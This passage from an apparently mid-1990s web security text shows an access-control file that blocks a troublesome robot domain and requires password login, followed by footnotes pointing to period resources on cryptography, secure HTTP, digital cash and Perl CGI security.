In the following example, all users from the domain robotX.net will be denied access. All other users will be allowed access, but only after entering a proper user ID and password found in the .htpasswd and .htgroup files:

AuthUserFile /security/.htpasswd
AuthGroupFile /security/.htgroup
AuthName GoodUsers
AuthType Basic

<Limit GET>
order deny,allow
deny from .robotX.net
allow from all
</Limit>

This method of protection is particularly useful for denying access to Web robots that might be causing problems on a Web site. By placing an access file in the HTTP server root directory, with /dev/null/ for the user and group files, any remote sites causing trouble can be readily denied access to the entire Web site.

Transaction Security and Security Administration Check


Footnotes

You can find the RSA Labs home page at http://www.rsa.com/, and a general on-line FAQ about authentication, public-key cryptography, and digital signatures at http://www.rsa.com/rsalabs/faq/faq_gnrl.html.
A HotJava product description and Java language description are at http://java.sun.com/.
The Kerberos on-line FAQ is at http://www.ov.com/misc/krb-faq.html.
The essential features of Pretty Good Privacy are available at http://www.mit.edu/people/warlord/pgp-class/pgp-works.html.
The RIPEM information page is http://www.cs.indiana.edu/ripem/dir.html. Mark Riordan runs a nonanonymous FTP server at ripem.msu.edu (because of RSA export restrictions, it is open only to U.S. and Canadian residents); to use this server, telnet to ripem.msu.edu, fill out a brief questionnaire, and certify eligibility. Then, the software can be downloaded via FTP. Participants in RIPEM secure communications networks store their public keys on this server; you can download the public key database from ripem.msu.edu/pub/crypt/ripem/pubkeys.txt.
EIT's information home for Secure NCSA httpd is http://www.eit.com/projects/s-http/. This includes a good historical introduction to the technology.
Allan Schiffman's Interop 1994 speech on SHTTPD is at http://www.eit.com/presentations/shttp-ams/index.html.
See http://nii-server.isi.edu/gost-group/ for details on the GOST group's work on NetCheque and NetCash.
First Virtual is on-line at http://www.fv.com/.
Digicash has a marketing brochure at http://www.digicash.com/publish/digibro.html and recent news at http://www.digicash.com/news/news.html.
Microsoft's Internet Security framework FAQ is available at http://www.microsoft.com/intdev/security/faq4.htm.
Paul Phillips has a good CGI security resource page at http://www.cerf.net/~paulp/cgi-security/.
Win32 Perl porting information is at http://www.perl.hip.com/. Recently, the NT port was extended to run on Win95 as well, but Perl on NT overall is significantly more robust. A mailing group is set up for 32-bit Perl porting issues; the group e-mail is perl-win32-users@mail.hip.com, and new subscribers can be enrolled via the porting information URL.
Tom Christiansen has introductory information on the Perl NT problems at http://mox.perl.com/perl/news/latro-announce.html. His Perl 5 script latro, a probe program to detect sites with these problems, is available at http://mox.perl.com/perl/scripts/latro.html. The NT dangers are explored in depth, along with guidelines for proper usage of Perl under NT, at http://w4.lns.cornell.edu/~pvhp/perl/ntperl.html.